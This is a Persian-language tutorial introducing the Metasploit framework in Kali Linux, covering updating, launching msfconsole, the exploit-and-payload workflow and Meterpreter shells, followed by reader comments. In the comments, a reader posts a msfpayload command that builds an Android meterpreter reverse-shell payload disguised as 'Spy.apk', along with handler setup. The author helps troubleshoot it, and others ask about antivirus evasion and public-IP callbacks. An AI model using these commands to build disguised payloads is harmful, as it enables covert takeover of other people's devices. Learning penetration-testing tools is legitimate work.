متااسپلویت چیست؟ معرفی پلتفرم امنیتی Metasploit در کالی لینوکس

برای جامعه انجام دهندگان تست های امنیت، Metasploit و Metasploit Pro یکی از جذاب ترین ابزارهایی است که تاکنون به آن برخورده اند. Metasploit بشما یک framework و یا یک زمینه کامل و بی نقص برای تست های امنیت میدهد.

وب سایت توسینسو

چهارچوب Metasploit یک پلت فرم جامع برای انجام تست های آسیب پذیری و نفوذ است. این پلت فرم با هزاران نقطه قابل نفوذ، صدها payload و مبدل های مختلفی لود میشود. در اینجا و قسمت های بعد استفاده های اساسی و پایه ای را در Metasploit پوشش خواهیم داد و در ادامه مباحث خواهیم آموخت که چگونه از Metasploit به عنوان هدفی تستی استفاده لازم را ببریم. اگر شما با کارکردهای metasploit آشنا هستید، میتوانید با خیال راحت این بخش را رد کنید و یا از آن به عنوان مروری بر دانسته های خود استفاده کنید.

بروزرسانی

معمولا برای بروزرسانی Metasploit، باید فرمان "mfsupdate" را اجرا کنید اما با دانستن این نکته که آپدیت های Metasploit با آپدیت های هفتگی کالی نیز همگام سازی میشوند، ممکن است رفتار شما در قبال بروزرسانی جداگانه Metasploit کمی تغیر کند.

مروری بر Metasploit

شما میتوانید از طرق زیر به Matasploit دسترسی داشته باشید:

  • • Kali Linux/Top Ten Security Tools/Metasploit framework
  • • Kali linux/Exploitation Tools/Metasploit
  • • وارد کردن فرمان "msfconsole" در ترمینال

هنگامی که Metasploit لود شود، شما یا صفحه نمایش نشان داده در شکل زیر روبرو خواهید شد:

وب سایت توسینسو

اگر تا بحال با این پلت فرم روبرو نشده باشید، ممکن است کمی گیج کننده به نظر برسد اما هنگامی که متوجه شوید که چگونه کار میکند، میتوانید با آن کارهای جالبی انجام دهید.اساسا، استفاده از Metasploit برای حمله به یک سیستم معمولا شامل موارد زیر میشود:

  1. انتخاب یک اکسپلویت
  2. تنظیم آپشن ها و گزینه های اختیاری اکسپلویت
  3. انتخاب یک payload
  4. تنظیم آپشن ها و گزینه های اختیاری Payload
  5. اجرا کردن اکسپلویت
  6. برقررای ارتباط با سیستم مورد نظر (سیستم ریموت)
  7. اجرای فرآیند سوء استفاده از سیستم مورد نظر

شکل زیر مثالی از این فرایند را نشان خواهد داد، اما نگران نباشید؛ فرآیند گفته شده را در ادامه بصورت جامع برای شما توضیح خواهیم داد:

وب سایت توسینسو

بسته به نوع اکسپلویت و استفاده ای که میخواهیم از سیستم هدف ببریم؛ زمانی فرآیند تکمیل میشود که توسط Remote shell به سیستم هدف و یا Meterpreter shell بصورت عادی اکسپلویت را پایان دهیم. Meterpreter ابزاریست که در Metasploit تعبیه شده است.یک remote shell اساسا کانکشن ترمینال از راه دور و یا یک نسخه متنی از remote desktop برای کاربران ویندوز است. Remote shell بما این امکان را میدهد تا دستورات را از طریق کیبرد منتقل کنیم.

اما meterpreter shell مجموعه ای از برنامه ها و عناصر جالب را بما پیشنهاد میدهد که بواسطه آن ها میتوانیم درباره سیستم هدف اطلاعات جمع اوری کنیم، کنترل دیوایس های آن مانند وبکم و یا میکروفن را بدست بگیریم، ویا برای دسترسی های بعدی تحت شبکه جای پای خود را محکم کنیم.در بیشتر حالات بسته به این که چه کاری میخواهیم انجام دهیم، یک Meterpreter shell امکانات بیشتری را به نسبت یک regular shell در اختیار قرار میدهد. در مورد Meterpreter shell بعدها مفصل صحبت خواهیم کرد اما در بخش بعد قصد داریم تا 5 مرحله نخست از 7 مرحله گفته شده در بالا را مرور کنیم. پس با ما همراه باشید.سربلند و مانا باشید.

پایان

نویسنده: احسان امجدی

منبع: جزیره امنیت اطلاعات و ارتباطات وب سایت توسینسو

هرگونه نشر و کپی برداری بدون ذکر منبع و نام نویسنده دارای اشکال اخلاقی می باشد.

18 نظر
مهران سیفعلی نیا

ببخشید من یکسری فرمان رو اجرا میکنم که باید منجر به ایجاد هندلر و اجرای اون بشه ولی با ارور روبه رو میشم،من کدها و ارور رو مینویسم اگه میشه راهنماییم کنید.توجه کنید که LHOST گوشی خودمه که به مودم وصله و LPORT رو هم حتی روی اعداد 80،8080،25 , 21 هم امتحان کردم جواب نداد.

msfpayload android//meterpreter//reverse_tcp LHOST=192.168.1.21 LPORT=443 R > Spy.apk

سپس وارد کنسول msf میشم و مینویسم:

use exploit//multi//handler

سپس که وارد قسمت بعد شدم مینویسم:

set payload android//meterpreter//reverse_tcp

set lhost 192.168.1.21

set lport 443

exploit

در اینجا با ارور زیر مواجه میشم:

Hnadler failed to bind to 192.168.1.21

به بزگی خودتون ببخشید اگه اشتباه تایپی داره،یه ربع به مغزم فشار آوردم یادم بیاد فرمانها چی بودن. D:

احسان امجدی

چرا LHOST و LPORT؟ مگه گوشیتون مقصد حمله نیست؟ باید بجای اون ها از RHOST و RPORT استفاده کنید.

البته اگه گوشیتون مقصد حمله باشه و حمله رو از روی کالی اجرا کنید.

احسان امجدی

مهران جان LHOST باید IP سیستم کالی خودت باشه نه IP گوشی. اگه اینطوری هست پس پورت رو عوض کن. یه پورت بذار که مطمئن باشی استفاذده نمیشه مثلا 1506. احتمالا سیستمت از پورت 443 داره استفاده میکنه. اینا رو امتحان کن بهم بگو

در ضمن فکر میکنم طبق آموزش پیش نرفتیااا. یبار دیگه آموزش رو مرور کن و طبق اون پیش برو

مهران سیفعلی نیا

خیلی ممنون،این مطالب رو من طبق یک آموزش دیگه پیش رفته بودم و میخواستم دلیلش رو بدونم،حتما با آموزش های شما پیش میرم چون آموزش های شما خیلی کامل تر و واضخ تره،ممنون.

مهران سیفعلی نیا

ببخشید یه سوالی داشتم،دیدم خیلی سوال کوچیکیه برای مطرح کردن به عنوان سوال،گفتم از شما بپرسم.

من هنگام اجرای فرمان airmon-ng با صفحه ی زیر رو به رو میشم،درحالی که به من گفتن باید یکسری اطلاعات در اینجا نشون داده بشه.

میتونید راهنماییم کنید.

airmon-ng

احسان امجدی

باید این عبارت رو تایپ کنی بجای airmon-ng

"airmon-ng start wlan0"

احسان امجدی

مهران جان بجای اجرای عبارت خالی "airmon-ng" باید عبارت زیر رو اجرا کنی:

airmon-ng start wlan0
مهران سیفعلی نیا

ممنون من در جایی خونده بودم که اول باید عبارت airmon-ng رو اجرا کنم تا بهم Interface بده بعد فرمان[ airmon-ng start [Interface name

رو اجرا کنم،پس یعنی همین فرمانی که گفتید رو اجرا کنم مشکلی نداره؟

احسان امجدی

فکر نمیکنم مشکلی باشه. واسه من که جواب میده.

1100

*با عرض سلام و خسته نباشید.

من این برنامه رو نصب کردم در موقع نصب هم انتی ویروس و هم فایروال رو غیرفعال کردم

اما وقتی روی برنامه کلیک میکنم باز میشه و فورا برنامه خودش بسته میشه(برنامه از صفحه دسکتاپ میپره)

روی ویندوز 7و8 امتحان کردم هردو همین مشکلو داشتن.

خواهشا اگ امکانش هست راهنماییم کنین.

مرسی*

احسان امجدی

دوست عزیز این برنامه مستقلا اجرا نمیشه و باید از طریق صفحه command prompt به آدرس نصب برنامه بری و بعد از طریق همین محیط برنامه رو اجرا و دستورات لازم رو اجرا کنی.

shayan123

سلام.

دوست عزیز میتونم تمام این کد ها رو تو اوبونتو اجرا کنم؟؟؟؟؟؟

اصلا اوبونتو برای اینکارا بدرد میخوره؟؟

اگه میشه جوابم رو به ایمیلم بفرستید

احسان امجدی

این دستورات بر روی پلت فرم متااسپلویت قابل فهم و اجرا هستند. اینکه پلت فرم متااسپلویت بر روی ابونتو قابل اجرا هست یا نه، اطلاعاتی ندارم فقط میدونم که بطور پیش فرض بر روی ابونتو وجود نداره

حسین میرزایی

باسلام و عرض خسته نباشید به خدمت استاد امجدی

استاد امجدی بنده نصب کردم کالی لینوکس 2 رو ولی امکاناتش خیلی کمه از کالی 1 ایا بنده نوحوه استفاده از کالی 2 رو بلد نیستم؟؟؟ یا باید افضونه هایه دیگه ای نصب کنم؟؟؟ اگر زحمت نباشد من در اینترنت دنبال ورژن 1 گشتم ولی پیدا نکردم لینک ورژن 1 کالی رو برایه استفاده دوستان قرار بدین

باتشکر از شما

احسان امجدی

قطعا کالی 2 از نظر امکانات و ورژن نرم افزارها وضعیت بهتری رو به نسبت ورژن 1 داره. در مورد پیدا نکردن نرم افزارها هم باید بگم که با رفتن به انتهای منوی اپلیکیشن، حق search بشما داده میشه.. احیانا اگه نرم افزاری رو پیدا نکردید، میتونید اونجا جستجو کنید.

danietzio

سلام من می خواستم واسه کالی vpn درست کنم ولی هرکاری کردم نشد ، حتی گزینه OpenVpn هم باز شد ولی گزینه pptpرو نتونستم باز کنم ، چون کلا اگه بخوایم از طریق دانشگاه به اینترنت وصل شیم باید اول به خود دانشگاه بعد با vpn به اینترنت وصل شیم ، میشه کاری کرد ؟

mr_kali

سلام خسته نباشید

ببخشید من یک سوال داشتم در رابطه با بایند کردن پایلود رو عکس و بیشتر کردن بایپس ها جهت دور زدن انتی ویروس میخواسم بدونم با کالی2 چجوری اینکار انجام بدم؟

مسعود طاهری چورسی

با سلام خدمت دوستان جناب مهندس امجدی میخواستم بدونم تو این دستور :>

msfpayload androidmeterpreterreverse_tcp LHOST=192.168.1.21 LPORT=443 R > Spy.apk

بجای ای پی هاست که یک ای پی داخلی وارد شده من بخوام ای پی ولید وارد کنم شرایط فرق میکنه و با چه پورتی کار کنم بهتره ؟

نظر شما
برای ارسال نظر باید وارد شوید.
از سرتاسر توسینسو
تنظیمات حریم خصوصی
تائید صرفنظر
×

تو می تونی بهترین نتیجه رو تضمینی با بهترین های ایران بدست بیاری ، پس مقایسه کن و بعد خرید کن : فقط توی جشنواره پاییزه می تونی امروز ارزونتر از فردا خرید کنی ....